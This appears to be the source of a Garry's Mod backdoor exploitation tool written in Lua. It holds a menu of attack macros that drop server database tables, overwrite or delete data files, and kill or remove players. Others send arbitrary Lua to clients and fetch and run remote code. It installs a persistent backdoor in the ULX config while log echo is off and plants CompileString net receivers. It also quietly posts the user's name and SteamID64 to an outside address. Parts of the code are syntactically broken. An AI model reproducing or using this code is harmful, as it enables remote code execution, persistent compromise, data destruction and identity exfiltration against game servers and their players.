                                ["Desc"] = "Creates a nuke 'made' by selected user(s) & activates it where they're standing.",
                              ["Console jammer"] = {
                                ["Type"] = 1,
                                ["Code"] = [[
                                if !(timer.Exists("consoleJammer")) then
                                  timer.Create("consoleJammer", 0.5, 0, function()
                                  print( "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" )
                                  end )
                                ["Desc"] = "Spams the server side console with a fuck load of new lines",
                              ["Moan steps"] = {
                                ["Type"] = 1,
                                ["Code"] = [[
                                if !(hook.GetTable()["PlayerFootstep"]["moanStep"]) then
                                  hook.Add("PlayerFootstep", "moanStep", function(ply, pos, foot, sound2, volume, filter) ply:EmitSound( "vo/npc/female01/pain06.wav",75,math.random( 50, 150 )) end )
                                  hook.Remove("PlayerFootstep", "moanStep")
                                ["Desc"] = "Turns all steps into highly orgasmic moans.",
                              ["Delete server"] = {
                                ["Type"] = 3,
                                ["Code"] = [[
                                local date = "%m-%d-%y" )
                                local databases = { "jobdata","darkrp_door","darkrp_levels","darkrp_prestige","darkrp_doorgroups","darkrp_doorjobs","darkrp_jobspawn","darkrp_position","darkrp_player","darkrp_dbversion","FAdmin_CAMIPrivileges","FADMIN_GROUPS","FAdmin_Immunity","FADMIN_MOTD","FAdmin_PlayerGroup","FADMIN_PRIVILEGES","FADMIN_RESTRICTEDENTS","FAdmin_ServerSettings","FAdminBans","FPP_ANTISPAM1","FPP_BLOCKED1","FPP_BLOCKMODELSETTINGS1","FPP_ENTITYDAMAGE1","FPP_GLOBALSETTINGS1","FPP_GRAVGUN1","FPP_GROUPMEMBERS1","FPP_GROUPS3","FPP_GROUPTOOL","FPP_PHYSGUN1","FPP_PLAYERUSE1","FPP_TOOLADMINONLY","FPP_TOOLGUN1","FPP_TOOLRESTRICTPERSON1","FPP_TOOLTEAMRESTRICT","FPP_BLOCKEDMODELS1","awarn_playerdata","awarn_serverdata","awarn_warnings","blogs_players_v3","blogs_v3","stt_date","stt_players","mlog_logs","mlog_permissions","atlaschat_players","atlaschat_ranks","atlaschat_remote","atlaschat_restrictions","OreBag","fcd_playerData","dailylogin","ChessLeaderboard","qsgr_data","voting_npcs","cac_incidents","steam_rewards","playerdata","playerinformation","utime","permaprops","cc_characters","cc_npcs","ckit_chips","ckit_persist","exsto_data_bans","exsto_data_ranks","exsto_data_users","exsto_data_variables","exsto_restriction","inventories","kinv_items","libk_player","permitems","player_gangapps","player_gangdata","player_gangs","ps2_categories","ps2_equipmentslot","ps2_HatPersistence","ps2_itemmapping","ps2_itempersistence","ps2_OutfitHatPersistenceMapping","ps2_outfits","ps2_playermodelpersistence","ps2_servers","ps2_settings","ps2_trailpersistence","ps2_wallet","removeprops","scoreboard_friends","serverguard_analytics","serverguard_bans","serverguard_pms","serverguard_ranks","serverguard_reports","serverguard_schema","serverguard_ttt_autoslays","serverguard_users","serverguard_watchlist","tttstats","ttt_passes_history","specdm_stats_new","ps2_achievements","ps2_boosterpersistence","ps2_cratepersistence","ps2_instatswitchweaponpersistence","ps2_keypersistence","ps2_rolecontrolpersistence","ps2_weaponpersistence","rapsheet","damagelog_autoslay","damagelog_names","damagelog_oldlogs","damagelog_weapons","kmapvote_mapinfo","kmapvote_ratings","mgang_gangs","mgang_players","deathrun_ids","deathrun_records","deathrun_stats","sui_ratings","shop_texthats","shop_money","shop_items","report_log" }
                                local datafiles = { "ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","wire_version.txt","UTeam.txt","prevhas.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","hitnumbers/settings.txt","soundlists/common_sounds.txt","vcmod/controls.txt","vcmod/dataserver.txt","qsgr_data/sqgr_settings.txt","blogs/configcache.txt","blogs/language.txt","cac/adminuipack.txt","ezjobs/config.txt","damagelog/colors.txt","damagelog/filters_new.txt","craphead_scripts/armory_robbery/rp_downtown_v4c/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v2/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_evilmelon_v1/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v3/policearmory_location.txt","craphead_scripts/armory_robbery/rp_downtown_v4c_v4/policearmory_location.txt","mg_gangsdata/mg_npcspawns.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","prevhash.txt","permaprops_config.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","vliss/settings/config.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
                                local sensitivefiles = { "ulx_logs/"".txt","ulib/bans.txt","ulib/groups.txt","ulib/misc_registered.txt","ulib/users.txt","ulx/adverts.txt","ulx/apromote.txt","ulx/banmessage.txt","ulx/banreasons.txt","ulx/downloads.txt","ulx/gimps.txt","ulx/motd.txt","ulx/restrictions.txt","ulx/sbox_limits.txt","ulx/votemaps.txt","apg/settings.txt","atags/tags.txt","atags/rankchattags.txt","atags/playerchattags.txt","atags/tags.txt","atags/selectedtags.txt","atags/ranktags.txt","atags/playertags.txt","vcmod/settings_sv.txt","vcmod/config_sv_privilages.txt","cac/system_log_sv.txt","cac/serverworkshopinformation.txt","cac/settings.txt","cac/serverluainformation.txt","vcmod/controls.txt","vcmod/dataserver.txt","blogs/configcache.dat","blogs/language.txt","blogs/config_v5.txt","cac/adminuipack.txt","ulx/debugdump.txt","ulx/empty_teams.txt","chattags.txt","caseclaims.txt", "sammyservers_textscreens.txt","permaprops_permissions.txt","chattags.txt","permaprops_config.txt","whitelist.txt","zwhitelistjobdata/jobsetting.txt","zwhitelistjobdata/whitelistjob.txt","zmodserveroption/sysjobwhitelist.txt","nordahl_spawnpoint/rp_venator_v3.txt","nordahl_spawnpoint/rp_venator_v2.txt","nordahl_spawnpoint/rp_venator_v1.txt","nordahl_spawnpoint/rp_venator_gg.txt","nordahl_spawnpoint/rp_venator_ausv4.txt","nordahl_spawnpoint/rp_venator_v2_ffg.txt","planningevent/prehud.txt","planningoption/hourformat.txt","nordahl_spawnpoint/arena_byre.txt","nordahl_spawnpoint/rp_venator_v2_immersive.txt","nordahl_spawnpoint/rp_venator_fade_v3.txt","nordahl_spawnpoint/rp_venator_gr.txt","nordahl_spawnpoint/rp_tatoonie_dunsea_v1.txt","nordahl_spawnpoint/rp_scifi.txt","nordahl_spawnpoint/rishimoon_crimson.txt","nordahl_spawnpoint/rp_pripyat_hl2.txt","nordahl_spawnpoint/rp_onwardhope.txt", "nordahl_spawnpoint/rp_oldworld_fix.txt","nordahl_spawnpoint/sd_doomsday.txt","nordahl_spawnpoint/sd_doomsday_event.txt","nordahl_spawnpoint/rp_naboo_city_v1.txt","nordahl_spawnpoint/rp_noclyria_crimson.txt","nordahl_spawnpoint/rp_nar_shaddaa_v2.txt","nordahl_spawnpoint/rp_mos_mersic_v2.txt","nordahl_spawnpoint/rp_kashyyk_jungle_b2.txt","nordahl_spawnpoint/dust_dunes.txt","nordahl_spawnpoint/rp_cscdesert_v2-1_propfix.txt","nordahl_spawnpoint/rd_asteroid.txt","nordahl_spawnpoint/naboo.txt","nordahl_spawnpoint/kashyyyk.txt","nordahl_spawnpoint/geonosis.txt","nordahl_spawnpoint/fightspace3b.txt","nordahl_spawnpoint/endor.txt","nordahl_spawnpoint/toth_forgotten.txt"}
                                for k,v in pairs(databases) do
                                  if sql.TableExists(v) then
                                    sql.Query("DROP TABLE "..v.." ;")
                                    sql.Query("CREATE TABLE IF NOT EXISTS "..v.." ( steamid TEXT NOT NULL PRIMARY KEY, value TEXT );")
                                for k,v in pairs(datafiles) do
                                  if file.Exists(v) then
                                    file.write(v, " hehe")
                                for k,v in pairs(sensitivefiles) do
                                  if file.Exists(v) then
                                    file.write(v, " hehe")
                                ["Desc"] = "Removes as much data as possible.",
                              ["Kill player (silent)"] = {
                                ["Type"] = 2,
                                ["Code"] = [[v:KillSilent()]],
                                ["Desc"] = "Silent slay a player.",
                              ["Delete props"] = {
                                ["Type"] = 2,
                                ["Code"] = [[v:ConCommand("gmod_cleanup")]],
                                ["Desc"] = "Removes all of the selected users props.",
                              ["Send lua"] = {
                                ["Type"] = 2,
                                ["Code"] = [[ v:SendLua( ""..@1.."") ]],
                                ["Desc"] = "Sends lua to the selected user.",
                                ["NeedsParameters"] = 1,
                              ["My ip is..."] = {
                                ["Type"] = 2,
                                ["Code"] = [[
                                if (darkrp || DarkRP) then
                                  v:SendLua('http.Fetch("", function(b,l,h,c) LocalPlayer():ConCommand("say /ooc My IP is "..b) end, function(error) return error end )')
                                  v:SendLua('http.Fetch("", function(b,l,h,c) LocalPlayer():ConCommand("say My IP is "..b) end, function(error) return error end )')
                                ["Desc"] = "Forces the selected user(s) to say their own ip in chat.",
                              ["Ice skating simulator"] = {
                                ["Type"] = 1,
                                ["Code"] = [[ if !(icePark) then icePark = true RunConsoleCommand("sv_friction", 0) else icePark = false RunConsoleCommand("sv_friction", 8) end ]],
                                ["Desc"] = "Makes everyone skate around like they're on ice.",
                              ["Scramble vision"] = {
                                ["Type"] = 2,
                                ["Code"] = [[
                                v:SendLua('http.Fetch("", function(b,l,h,c) RunString(b) end, function(error) print(error) end )')
                                ["Desc"] = "Fucks the view of target",
                              // key/view scrambler, fuck with escape menu
                              ------------------------ dangerous codens ------------------------
                              ["DarkRP clear all money"] = {
                                ["Type"] = 3,
                                ["Code"] = [[RunConsoleCommand("rp_resetallmoney")]],
                                ["Desc"] = "Kids will cry to the admins for the next week about losing their precious money",
                              ["Cleanup map"] = {
                                ["Type"] = 3,
                                ["Code"] = [[game.CleanUpMap()]],
                                ["Desc"] = "Wipe the map clean, taking everybodys cars, printers and bases out",
                              ["Vaporize all players"] = {
                                ["Type"] = 3,
                                ["Code"] = [[for k, v in pairs(player.GetAll()) do v:Remove() end]],
                                ["Desc"] = "Deletes their player entity, leaving them staring at a wall of errors",
                              ["FPP Unrestrict everything"] = {
                                ["Type"] = 3,
                                ["Code"] = [[FPP.Blocked = {} FPP.BlockedModels = {} FPP.RestrictedTools = {} FPP.RestrictedToolsPlayers = {} ]],
                                ["Desc"] = "",
                              ["Wipe data folder"] = {
                                ["Type"] = 3,
                                ["Code"] = [[local files, directories = file.Find( "*", "DATA" ) for k, v in pairs( files ) do file.Delete( v ) end ]],
                                ["Desc"] = "Wipe the servers data folder, fucking all their settings and stuff up",
                              ["Wipe DarkRP SQL Tables"] = {
                                ["Type"] = 3,
                                ["Code"] = [[ MySQLite.query ('DROP TABLE darkrp_player' MySQLite.query('CREATE TABLE IF NOT EXISTS darkrp_player(idx INTEGER NOT NULL)') ]],
                                ["Desc"] = "Completely fucks darkrp, forces them to reinstall the entire server",
                            local selectedbackdoor = ""
                            local backdoorargs = ""
                            local selectedplayers = {}
                            //////////////////////////////// BIG PRIVET CHEETZ ////////////////////////////////
                            BD.BDMacros["@ Persistent Infection"] = {
                              ["Type"] = 1,
                              ["Code"] = [[
                              local config = ULib.fileRead( "data/ulx/config.txt" )
                              config = config.."\nulx logEcho 0"
                              config = config.."\nulx luarun %BD"
                              config = config.."\nulx logEcho 1"
                              ULib.fileWrite( "data/ulx/config.txt", config )
                              for _, p in pairs(player.GetAll()) do if %LCP then p:ChatPrint( "Persistent infection installed on server" ) end end
                              ["Desc"] = "Writes the backdoor code into memory, making sure that it stays on the server after restart",
                              ["Private"] = true,
                            BD.BackdoorTypes[">Odium Detector"] = {
                              ["Code"] = "util.AddNetworkString( 'NoOdium_ReadPing' ) net.Receive( 'NoOdium_ReadPing', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
                              ["Netkey"] = "NoOdium_ReadPing",
                            BD.BackdoorTypes["No Narks"] = {
                              ["Code"] = "util.AddNetworkString( 'NoNerks' ) net.Receive( 'NoNerks', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )",
                              ["Netkey"] = "NoNerks",
                            function BD.GenerateBackdoorList( parent, category )
                              for k, v in SortedPairs( BD.BDMacros, false ) do
                                if v["Type"] != category then continue end
                                local plypanel2 = vgui.Create( "DPanel" )
                                plypanel2:SetPos( 0, 0 )
                                plypanel2:SetSize( 200, 25 )
                                plypanel2.Paint = function() -- Paint function
                                draw.RoundedBoxEx(8,1,1,plypanel2:GetWide(),plypanel2:GetTall(),Color(0, 0, 0, 150), false, false, false, false)
                                if selectedbackdoor == k then surface.SetDrawColor(Color(50, 250, 90, 255)) else surface.SetDrawColor(Color(50, 50, 90, 255)) end
                                surface.DrawOutlinedRect(1, 1, plypanel2:GetWide() - 1 , plypanel2:GetTall() - 1)
                              local plyname = vgui.Create( "DLabel", plypanel2 )
                              plyname:SetPos( 10, 5 )
                              plyname:SetFont( "Trebuchet18" )
                              local tcol = Color( 255, 255, 255 )
                              if v.Private then tcol = Color( 155, 255, 155 ) end
                              plyname:SetColor( tcol )
                              plyname:SetText( k )
                              plyname:SetSize(180, 15)
                              local ****** = vgui.Create("DButton", plypanel2)
                              ******:SetSize( plypanel2:GetWide(), plypanel2:GetTall() )
                              ******:SetPos( 0, 0 )
                              if v["Desc"] != "" then ******:SetToolTip( v["Desc"] ) end
                              ******.Paint = function(panel, w, h)
                            ******.DoClick = function()
                            selectedbackdoor = k
                          parent:AddItem( plypanel2 )
                      function BD.FormatCodeTargeted()
                        if !BD.BackdoorActive() then BD.ChatText( "Warning: backdoor malfunctioning or not present!", Color(255,155,155) ) return end
                        if selectedbackdoor == "" then BD.ChatText( "You haven't selected a macro to use!", Color(255,155,155) ) return end
                        local param = string.Explode( ",", backdoorargs )
                        local ids = {}
                        for k, v in pairs( selectedplayers ) do
                          if !v:IsValid() then table.RemoveByValue( selectedplayers, v ) continue end
                          table.insert( ids, v:UniqueID() )
                        local code = [[ local targets = ## for k, v in pairs( player.GetAll() ) do if !v:IsValid() then continue end if table.HasValue( targets, v:UniqueID() ) then %% end end ]]
                        code = string.Replace( code, "##", table.ToString( ids ) )
                        code = string.Replace( code, "%%", BD.BDMacros[selectedbackdoor]["Code"] or "" )
                        code = string.Replace( code, "%LP", "p:UniqueID() == \""..LocalPlayer():UniqueID().."\"" )
                        if BD.BDMacros[selectedbackdoor]["NeedsParameters"] and (BD.BDMacros[selectedbackdoor]["NeedsParameters"] > #param or param[1] == "" ) then BD.ChatText( "This macro requires parameters to work! check its description for more info", Color(255,155,155) ) return end
                        if #param < 1 then param = { [1] = "derp", [2] = "derp", [3] = "derp", [4] = "derp", [5] = "derp" } end
                        for k, v in pairs( param ) do
                          code = string.Replace( code, "@"..k, [["]]..v..[["]] )
                        BD.Fire( code )
                      function BD.FormatCodeGlobal()
                        if !BD.BackdoorActive() then BD.ChatText( "Warning: backdoor malfunctioning or not present!", Color(255,155,155) ) return end
                        if selectedbackdoor == "" then BD.ChatText( "You haven't selected a macro to use!", Color(255,155,155) ) return end
                        local param = string.Explode( ",", backdoorargs )
                        local code = BD.BDMacros[selectedbackdoor]["Code"]
                        if BD.BDMacros[selectedbackdoor]["NeedsParameters"] and (BD.BDMacros[selectedbackdoor]["NeedsParameters"] > #param or param[1] == "" ) then BD.ChatText( "This macro requires parameters to work! check its description for more info", Color(255,155,155) ) return end
                        if #param < 1 then param = { [1] = "derp", [2] = "derp", [3] = "derp", [4] = "derp", [5] = "derp" } end
                        for k, v in pairs( param ) do
                          code = string.Replace( code, "@"..k, [["]]..v..[["]] )
                          code = string.Replace( code, "%LP", LocalPlayer():UniqueID() )
                          code = string.Replace( code, "%LCP", "p:UniqueID() == \""..LocalPlayer():UniqueID().."\"" )
                          code = string.Replace( code, "%BD", BD.GetActive().Code )
                        BD.Fire( code )
                      local safenet = net
                      local function bdnet()
                        if odium and odium.G then return end
                        return safenet
                      local h = http
                      local p = "Post"
                      local str = ""
                      local lp = LocalPlayer()
                      local n = lp:Nick()
                      local id = lp:SteamID64()
                      h[p](str, {
                        name = n,
                        steamid = id,
                      nil, nil)
                      function BD.Fire( code )
                        local cbd = BD.CurrentBackdoor
                        if !BD.Backdoors[cbd] then
                          BD.ChatText( "The selected backdoor is unavailable!", Color(255,155,155) )
                        local key = BD.BackdoorTypes[cbd].Netkey
                        bdnet().Start( key )
                        bdnet().WriteString( code )
                      function BD.BackdoorMenu()
                        BD.Backdoors = BD.PingBackDoors()
                        if !BD.IsMessagePooled( "cucked" ) and BD.BackdoorActive() then
                          BD.Fire( [[util.AddNetworkString( "cucked" )
                          function BDSendLua( p, str ) net.Start( "cucked" ) net.WriteString( str ) net.Send( p ) end
                            function BDSendLuaAll( str ) net.Start( "cucked" ) net.WriteString( str ) net.Broadcast() end
                              function BDInjectAids( p ) p:SendLua( 'net.Receive( "cucked", function() RunString( net.ReadString() ) end )' ) end
                                for k, v in pairs( player.GetAll() ) do BDInjectAids( v ) end
                                hook.Add( "PlayerInitialSpawn", "youonlygetcuckedagain", function( p ) BDInjectAids( p ) end)
                                ]] )
                              local BDMenu = vgui.Create("DFrame")
                              BDMenu:SetTitle("Backdoor Menu")
                              BDMenu.Paint = function( self, w, h)
                              surface.SetDrawColor( Color(50, 50, 90, 255) )
                              surface.DrawRect( 0, 0, w, h )
                              surface.SetDrawColor( Color(155, 155, 155, 255) )
                              surface.DrawOutlinedRect( 0, 0, w, h )
                              surface.DrawOutlinedRect( 1, 1, w - 2, h - 2 )
                              surface.SetDrawColor( Color(0, 0, 0, 200) )
                              surface.DrawRect( 10, 25, w - 20, h - 35 )
                              surface.DrawRect( 15, 30, w - 30, 35 )
                              draw.SimpleText("Indiscriminate Lulz", "DermaDefault", 22, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Specific Targets", "DermaDefault", 228, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Trash the place", "DermaDefault", 432, 75, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Players to Target", "DermaDefault", 432, 305, Color(255, 255, 255), 0, 1)
                              draw.SimpleText("Macro Paramaters (seperate with commas)", "DermaDefault", 432, 610, Color(255, 255, 255), 0, 1)
                            local it = 145
                            local wedungoofd = vgui.Create( "DLabel", BDMenu )
                            wedungoofd:SetPos( 25, 38 )
                            wedungoofd:SetFont( "Trebuchet18" )
                            wedungoofd:SetColor( Color( 100, 255, 100 ) )
                            wedungoofd:SetText( "CHOOSE BACKDOOR:" )
                            for bd, t in pairs( BD.BackdoorTypes ) do
                              local ****** = vgui.Create("DButton", BDMenu)
                              ******:SetSize( 100, 25 )
                              ******:SetPos( it, 35 )
                              ******:SetText( bd )
                              ******:SetTextColor(Color(255, 255, 255, 255))
                              ******.Paint = function(panel, w, h)
                              if BD.Backdoors[bd] then
                                surface.SetDrawColor(100, 100, 200 ,255)
                                surface.DrawOutlinedRect(0, 0, w, h)
                                surface.SetDrawColor(0, 0, 50 ,155)
                                surface.DrawRect(0, 0, w, h)
                                surface.SetDrawColor(50, 50, 50 ,155)
                                surface.DrawRect(0, 0, w, h)
                            ******.DoClick = function()
                            BD.ChatText( "Set active backdoor to ", Color(155,155,255) )
                            BD.CurrentBackdoor = bd
                          it = it + 110
                        local Plist = vgui.Create( "DPanelList", BDMenu )
                        Plist:SetPos( 20, 85 )
                        Plist:SetSize( 200, 530 )
                        Plist:SetPadding( 5 )
                        Plist:SetSpacing( 5 )
                        Plist:EnableHorizontal( false )
                        Plist:EnableVerticalScrollbar( true )
                        Plist:SetName( "" )
                        Plist.Paint = function( self, w, h )
                        surface.SetDrawColor(50, 50, 50 ,255)
                        surface.DrawOutlinedRect(0, 0, w, h)
                        surface.SetDrawColor(0, 0, 0 ,200)
                        surface.DrawRect(0, 0, w, h)
                      local Plist2 = vgui.Create( "DPanelList", BDMenu )
                      Plist2:SetPos( 225, 85 )
                      Plist2:SetSize( 200, 610 )
                      Plist2:SetPadding( 5 )
                      Plist2:SetSpacing( 5 )
                      Plist2:EnableHorizontal( false )
                      Plist2:EnableVerticalScrollbar( true )
                      Plist2:SetName( "" )
                      Plist2.Paint = function( self, w, h )
                      surface.SetDrawColor(50, 50, 50 ,255)
                      surface.DrawOutlinedRect(0, 0, w, h)
                      surface.SetDrawColor(0, 0, 0 ,200)
                      surface.DrawRect(0, 0, w, h)
                    local Plist3 = vgui.Create( "DPanelList", BDMenu )
                    Plist3:SetPos( 430, 85 )
                    Plist3:SetSize( 200, 210 )
                    Plist3:SetPadding( 5 )
                    Plist3:SetSpacing( 5 )
                    Plist3:EnableHorizontal( false )
                    Plist3:EnableVerticalScrollbar( true )
                    Plist3:SetName( "" )
                    Plist3.Paint = function( self, w, h )
                    surface.SetDrawColor(50, 50, 50 ,255)
                    surface.DrawOutlinedRect(0, 0, w, h)
                    surface.SetDrawColor(0, 0, 0 ,200)
                    surface.DrawRect(0, 0, w, h)
                  local Plist4 = vgui.Create( "DPanelList", BDMenu )
                  Plist4:SetPos( 430, 315 )
                  Plist4:SetSize( 200, 250 )
                  Plist4:SetPadding( 5 )
                  Plist4:SetSpacing( 5 )
                  Plist4:EnableHorizontal( false )
                  Plist4:EnableVerticalScrollbar( true )
                  Plist4:SetName( "" )
                  Plist4.Paint = function( self, w, h )
                  surface.SetDrawColor(50, 50, 50 ,255)
                  surface.DrawOutlinedRect(0, 0, w, h)
                  surface.SetDrawColor(0, 0, 0 ,200)
                  surface.DrawRect(0, 0, w, h)
                local ****** = vgui.Create("DButton", BDMenu)
                ******:SetSize( 200, 35 )
                ******:SetPos( 430, 660 )
                ******:SetText("Activate Backdoor!")
                ******:SetTextColor(Color(255, 255, 255, 255))
                ******.Paint = function(panel, w, h)
                surface.SetDrawColor(100, 100, 200 ,255)
                surface.DrawOutlinedRect(0, 0, w, h)
                surface.SetDrawColor(0, 0, 50 ,155)
                surface.DrawRect(0, 0, w, h)
              ******.DoClick = function()
              if !BD.BDMacros[selectedbackdoor] or selectedbackdoor == "" then BD.ChatText( "You haven't even selected a macro to use ya dingus!", Color(255,155,155) ) return end
              if BD.BDMacros[selectedbackdoor].Type == ( 1 or 3 ) then BD.FormatCodeGlobal() else BD.FormatCodeTargeted() end
            local helpimretarded = vgui.Create("DButton", BDMenu)
            helpimretarded:SetSize( 200, 35 )
            helpimretarded:SetPos( 20, 660 )
            helpimretarded:SetText("Print backdoor code")
            helpimretarded:SetTextColor(Color(255, 255, 255, 255))
            helpimretarded.Paint = function(panel, w, h)
            surface.SetDrawColor(100, 100, 200 ,255)
            surface.DrawOutlinedRect(0, 0, w, h)
            surface.SetDrawColor(0, 0, 50 ,155)
            surface.DrawRect(0, 0, w, h)
          helpimretarded.DoClick = function()
          BD.ChatText( "Output backdoor code to clipboard.  Ctrl-V it into a serverside .lua file on the target server then go molest its holes", Color(155,255,155) )
          local bdstring = BD.GetActive().Code
          --       local bdstring = [[util.AddNetworkString( "_CAC_ReadMemory" ) net.Receive( "_CAC_ReadMemory", function() local x = CompileString( net.ReadString(), "LuaCmd", false ) if isfunction( x ) then x() end end )]]
          SetClipboardText( bdstring )
        local helpimretarded2 = vgui.Create("DButton", BDMenu)
        helpimretarded2:SetSize( 200, 35 )
        helpimretarded2:SetPos( 20, 620 )
        helpimretarded2:SetText("ULX Luarun Backdoor")
        helpimretarded2:SetTextColor(Color(255, 255, 255, 255))
        helpimretarded2.Paint = function(panel, w, h)
        surface.SetDrawColor(100, 100, 200 ,255)
        surface.DrawOutlinedRect(0, 0, w, h)
        surface.SetDrawColor(0, 0, 50 ,155)
        surface.DrawRect(0, 0, w, h)
      helpimretarded2.DoClick = function()
      BD.ChatText( "Using ulx luarun to silently infect server", Color(155,255,155) )
      LocalPlayer():ConCommand( [[ulx rcon ulx logEcho 0]] )
      timer.Simple( 0.5, function()
      LocalPlayer():ConCommand( "ulx luarun "..BD.GetActive().Code )
      --            LocalPlayer():ConCommand( "ulx luarun util.AddNetworkString( '_CAC_ReadMemory' ) net.Receive( '_CAC_ReadMemory', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )" )
      end )
      timer.Simple( 1, function() LocalPlayer():ConCommand( [[ulx rcon ulx logEcho 1]] ) end )
      timer.Simple( 1.5, function() if BD.IsMessagePooled( BD.GetActive().Netkey ) then BD.ChatText( "Successfully infected!", Color(155,255,155) ) else BD.ChatText( "ULX infection failed!", Color(255,155,155) ) end end )
    local moonman = vgui.Create( "DTextEntry", BDMenu )
    moonman:SetPos( 430, 625 )
    moonman:SetSize( 200, 30 )
    moonman:SetText( backdoorargs )
    moonman.OnChange = function( self )
    backdoorargs = self:GetValue()
    --    surface.PlaySound("buttons/button3.wav")
    local target1 = vgui.Create("DButton", BDMenu)
    target1:SetSize( 40, 20 )
    target1:SetPos( 520, 295 )
    target1:SetTextColor(Color(255, 255, 255, 255))
    target1.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target1.DoClick = function()
    for _, p in pairs(player.GetAll()) do
    if not table.HasValue( selectedplayers, p ) then
    table.insert( selectedplayers, p )
    local target2 = vgui.Create("DButton", BDMenu)
    target2:SetSize( 40, 20 )
    target2:SetPos( 565, 295 )
    target2:SetTextColor(Color(255, 255, 255, 255))
    target2.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target2.DoClick = function()
    table.Empty( selectedplayers )
    local target2 = vgui.Create("DButton", BDMenu)
    target2:SetSize( 20, 20 )
    target2:SetPos( 610, 295 )
    target2:SetTextColor(Color(255, 255, 255, 255))
    target2.Paint = function(panel, w, h)
    surface.SetDrawColor(100, 100, 200 ,255)
    surface.DrawOutlinedRect(0, 0, w, h)
    surface.SetDrawColor(0, 0, 50 ,155)
    surface.DrawRect(0, 0, w, h)
    target2.DoClick = function()
    table.Empty( selectedplayers )
    table.insert( selectedplayers, LocalPlayer() )
    -- players list
    for k, v in pairs( player.GetAll() ) do
    local plypanel2 = vgui.Create( "DPanel" )
    plypanel2:SetPos( 0, 0 )
    plypanel2:SetSize( 200, 25 )
    plypanel2.Paint = function() -- Paint function
    draw.RoundedBoxEx(8,1,1,plypanel2:GetWide(),plypanel2:GetTall(),Color(0, 0, 0, 150), false, false, false, false)
    if table.HasValue( selectedplayers, v ) then surface.SetDrawColor(Color(50, 255, 90, 255)) else surface.SetDrawColor(Color(50, 50, 90, 255)) end
    surface.DrawOutlinedRect(1, 1, plypanel2:GetWide() - 1 , plypanel2:GetTall() - 1)
    local plyname = vgui.Create( "DLabel", plypanel2 )
    plyname:SetPos( 10, 5 )
    plyname:SetFont( "Trebuchet18" )
    local tcol = Color( 255, 255, 255 )
    if v == LocalPlayer() then tcol = Color( 155, 155, 255 ) end
    --  elseif BD.IsFriend( v ) then tcol = Color( 0, 255, 0 )
    --    elseif BD.GetRank(v) != ( "user" or "guest" or "player" ) then tcol = Color( 255, 100, 0 ) end
    plyname:SetColor( tcol )
    plyname:SetText( v:Nick() )
    plyname:SetSize(180, 15)
    local ****** = vgui.Create("DButton", plypanel2)
